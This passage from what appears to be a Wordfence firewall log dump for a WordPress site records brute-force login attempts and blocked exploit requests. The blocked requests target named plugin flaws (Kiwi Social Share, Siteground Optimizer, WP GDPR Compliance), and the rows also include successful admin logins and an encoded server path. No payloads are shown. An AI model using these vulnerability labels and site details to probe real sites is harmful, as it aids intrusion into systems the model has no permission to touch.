Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7454,1564470775.140327,1564470774.673900,'\0\0\0\0\0\0\0\0\0\0\rA',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7453,1564470782.333264,1564470781.528500,'\0\0\0\0\0\0\0\0\0\0\rA',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7452,1564470792.953609,1564470792.317100,'\0\0\0\0\0\0\0\0\0\0\rA',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7451,1564470798.660321,1564470798.064900,'\0\0\0\0\0\0\0\0\0\0\rA',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7450,1564470804.942242,1564470804.323400,'\0\0\0\0\0\0\0\0\0\0\rA',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7449,1564470814.319295,1564470813.781500,'\0\0\0\0\0\0\0\0\0\0\rA',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7934,1564614249.029587,1564614248.683100,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7935,1564614247.519364,1564614247.036900,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7936,1564614246.199303,1564614245.795300,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7937,1564614244.876190,1564614244.577900,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(8552,1567052469.516904,1567052469.268300,'\0\0\0\0\0\0\0\0\0\0s',0,403,0,0,0,'http://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WAF-RULE-149','{\"learningMode\":0,\"failedRules\":\"149\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvZGlnaXQ2MjYvY29tcGFueXJlZ2lzdHJhdGlvbi5vbmxpbmUvd3AtYWRtaW4vYWRtaW4tYWpheC5waHA=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(8549,1567052460.333335,1567052460.043000,'\0\0\0\0\0\0\0\0\0\0s',0,403,0,0,0,'http://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Kiwi Social Share <= 2.0.10 - Unauthenticated Update Any Option','{\"learningMode\":0,\"failedRules\":\"122\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(8551,1567052475.547858,1567052475.115900,'\0\0\0\0\0\0\0\0\0\0s',0,403,0,0,0,'http://companyregistration.online/wp-admin/admin-ajax.php?action=cp_add_subscriber',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WAF-RULE-149','{\"learningMode\":0,\"failedRules\":\"149\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvZGlnaXQ2MjYvY29tcGFueXJlZ2lzdHJhdGlvbi5vbmxpbmUvd3AtYWRtaW4vYWRtaW4tYWpheC5waHA=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(8544,1567052440.681793,1567052440.426000,'\0\0\0\0\0\0\0\0\0\0s',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php?action=cp_add_subscriber',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WAF-RULE-149','{\"learningMode\":0,\"failedRules\":\"149\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvZGlnaXQ2MjYvY29tcGFueXJlZ2lzdHJhdGlvbi5vbmxpbmUvd3AtYWRtaW4vYWRtaW4tYWpheC5waHA=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8545,1567052439.770092,1567052439.473500,'\0\0\0\0\0\0\0\0\0\0s',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WAF-RULE-149','{\"learningMode\":0,\"failedRules\":\"149\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvZGlnaXQ2MjYvY29tcGFueXJlZ2lzdHJhdGlvbi5vbmxpbmUvd3AtYWRtaW4vYWRtaW4tYWpheC5waHA=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8546,0.000000,1567052450.835370,'\0\0\0\0\0\0\0\0\0\0s',0,200,0,0,0,'https://companyregistration.online/wp-login.php?action=lostpassword','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','lostPassword',NULL,NULL),(8547,1567052462.052586,1567052461.745800,'\0\0\0\0\0\0\0\0\0\0s',0,403,0,0,0,'http://companyregistration.online/wp-json/siteground-optimizer/v1/enable-option',NULL,'Go-http-client/1.1','blocked:waf','Siteground Optimizer <= 5.0.12 - Improper REST capabilities checks','{\"learningMode\":0,\"failedRules\":\"134\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWpzb24vc2l0ZWdyb3VuZC1vcHRpbWl6ZXIvdjEvZW5hYmxlLW9wdGlvbg==\",\"path\":\"L3dwLWpzb24vc2l0ZWdyb3VuZC1vcHRpbWl6ZXIvdjEvZW5hYmxlLW9wdGlvbg==\",\"category\":\"auth-bypass\",\"ssl\":0}'),(8548,1567052461.182236,1567052460.868500,'\0\0\0\0\0\0\0\0\0\0s',0,403,0,0,0,'http://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":0}'),(8550,1567052459.515055,1567052459.218300,'\0\0\0\0\0\0\0\0\0\0s',0,403,0,0,0,'http://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP GDPR Compliance <= 1.4.2 - Update Any Option / Call Any Action','{\"learningMode\":0,\"failedRules\":\"120\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2FjdGlvbl0=\",\"paramValue\":\"d3BnZHByY19wcm9jZXNzX2FjdGlvbg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(8543,1567052416.829829,1567052413.944300,'\0\0\0\0\0\0\0\0\0\0s',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP GDPR Compliance <= 1.4.2 - Update Any Option / Call Any Action','{\"learningMode\":0,\"failedRules\":\"120\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2FjdGlvbl0=\",\"paramValue\":\"d3BnZHByY19wcm9jZXNzX2FjdGlvbg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8542,1567052418.429823,1567052417.698400,'\0\0\0\0\0\0\0\0\0\0s',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Kiwi Social Share <= 2.0.10 - Unauthenticated Update Any Option','{\"learningMode\":0,\"failedRules\":\"122\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8540,1567052426.079468,1567052425.825400,'\0\0\0\0\0\0\0\0\0\0s',0,403,0,0,0,'https://companyregistration.online/wp-json/siteground-optimizer/v1/enable-option',NULL,'Go-http-client/1.1','blocked:waf','Siteground Optimizer <= 5.0.12 - Improper REST capabilities checks','{\"learningMode\":0,\"failedRules\":\"134\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWpzb24vc2l0ZWdyb3VuZC1vcHRpbWl6ZXIvdjEvZW5hYmxlLW9wdGlvbg==\",\"path\":\"L3dwLWpzb24vc2l0ZWdyb3VuZC1vcHRpbWl6ZXIvdjEvZW5hYmxlLW9wdGlvbg==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(8541,1567052419.932506,1567052419.458700,'\0\0\0\0\0\0\0\0\0\0s',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(8527,0.000000,1567012912.835387,'\0\0\0\0\0\0\0\0\0\0-M',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8528,0.000000,1567015250.531353,'\0\0\0\0\0\0\0\0\0\0!#',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8529,0.000000,1567020056.972431,'\0\0\0\0\0\0\0\0\0\0%k',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8530,0.000000,1567021197.153139,'\0\0\0\0\0\0\0\0\0\0+',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8531,0.000000,1567022530.042196,'\0\0\0\0\0\0\0\0\0\0g',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8532,0.000000,1567027483.437233,'\0\0\0\0\0\0\0\0\0\0D9',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1','loginFailInvalidUsername',NULL,NULL),(8533,0.000000,1567028724.985304,'\0\0\0\0\0\0\0\0\0\0g',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8534,0.000000,1567029943.173109,'\0\0\0\0\0\0\0\0\0\0',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8535,0.000000,1567038754.080612,'\0\0\0\0\0\0\0\0\0\0m',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8536,0.000000,1567041309.818664,'\0\0\0\0\0\0\0\0\0\0_It',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8537,0.000000,1567043909.982482,'\0\0\0\0\0\0\0\0\0\0',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8538,0.000000,1567046471.988265,'\0\0\0\0\0\0\0\0\0\0&V',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8539,0.000000,1567049065.380845,'\0\0\0\0\0\0\0\0\0\0^',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8496,0.000000,1566927082.174221,'\0\0\0\0\0\0\0\0\0\0옆',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8497,0.000000,1566928261.256658,'\0\0\0\0\0\0\0\0\0\0\n',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8498,0.000000,1566930801.297287,'\0\0\0\0\0\0\0\0\0\0νL',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8499,0.000000,1566931985.387661,'\0\0\0\0\0\0\0\0\0\0EF',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8500,0.000000,1566934386.220475,'\0\0\0\0\0\0\0\0\0\0',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8501,0.000000,1566935664.567360,'\0\0\0\0\0\0\0\0\0\0g',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8502,0.000000,1566938130.608531,'\0\0\0\0\0\0\0\0\0\0YD',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8503,0.000000,1566941875.486664,'\0\0\0\0\0\0\0\0\0\0[[',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8504,0.000000,1566943224.117767,'\0\0\0\0\0\0\0\0\0\0Y',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8505,0.000000,1566944414.636297,'\0\0\0\0\0\0\0\0\0\0W',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8506,0.000000,1566949570.398146,'\0\0\0\0\0\0\0\0\0\0;',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8507,0.000000,1566950815.814181,'\0\0\0\0\0\0\0\0\0\0.',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8508,0.000000,1566952067.381632,'\0\0\0\0\0\0\0\0\0\0>z',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8509,0.000000,1566957017.993429,'\0\0\0\0\0\0\0\0\0\0/',0,503,0,0,0,'http://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(8510,0.000000,1566966526.104211,'\0\0\0\0\0\0\0\0\0\0\"',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8511,0.000000,1566969235.937307,'\0\0\0\0\0\0\0\0\0\0_',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8512,0.000000,1566970636.655481,'\0\0\0\0\0\0\0\0\0\0',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8513,0.000000,1566971792.333950,'\0\0\0\0\0\0\0\0\0\0Y',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8514,0.000000,1566973245.174019,'\0\0\0\0\0\0\0\0\0\0E',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8515,0.000000,1566976182.251214,'\0\0\0\0\0\0\0\0\0\0z',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8516,0.000000,1566977308.048491,'\0\0\0\0\0\0\0\0\0\0%k',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8517,0.000000,1566981511.677177,'\0\0\0\0\0\0\0\0\0\0.-K',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8518,0.000000,1566982776.520406,'\0\0\0\0\0\0\0\0\0\0\"D',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8519,0.000000,1566985663.544418,'\0\0\0\0\0\0\0\0\0\0DS',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8520,0.000000,1566987337.875381,'\0\0\0\0\0\0\0\0\0\0',0,302,0,3,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fwp-admin%2Fedit.php%3Fpost_type%3Dproduct%26orderby%3Ddate%26order%3Ddesc&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36','loginOK',NULL,NULL),(8521,0.000000,1566989719.157046,'\0\0\0\0\0\0\0\0\0\0&V',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8522,0.000000,1566999046.904965,'\0\0\0\0\0\0\0\0\0\0Y',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8523,0.000000,1567001333.669215,'\0\0\0\0\0\0\0\0\0\0X',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8524,0.000000,1567002362.742172,'\0\0\0\0\0\0\0\0\0\0Hv',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8525,0.000000,1567006933.544776,'\0\0\0\0\0\0\0\0\0\0c\"',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8526,0.000000,1567008162.295365,'\0\0\0\0\0\0\0\0\0\0LhC',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8366,0.000000,1566156001.472270,'\0\0\0\0\0\0\0\0\0\0mFd\Z',0,503,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.6; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) chromeframe/8.0.552.215','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(8367,0.000000,1566197431.731012,'\0\0\0\0\0\0\0\0\0\0G',0,302,0,3,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fwp-admin%2Fedit.php%3Fpost_type%3Dpage%26orderby%3Ddate%26order%3Ddesc%26ids%3D32734&reauth=1','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36','loginOK',NULL,NULL),(8368,0.000000,1566287531.767373,'\0\0\0\0\0\0\0\0\0\0G',0,302,0,3,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36','loginOK',NULL,NULL),(8369,0.000000,1566291992.195510,'\0\0\0\0\0\0\0\0\0\0E.$',0,200,0,0,0,'https://companyregistration.online/?_wfsf=detectProxy','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.82 Safari/537.1','scan:detectproxy',NULL,NULL),(8370,0.000000,1566292606.088293,'\0\0\0\0\0\0\0\0\0\0G',0,302,0,3,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36','loginOK',NULL,NULL),(7814,1564591628.685594,1564591628.204000,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site 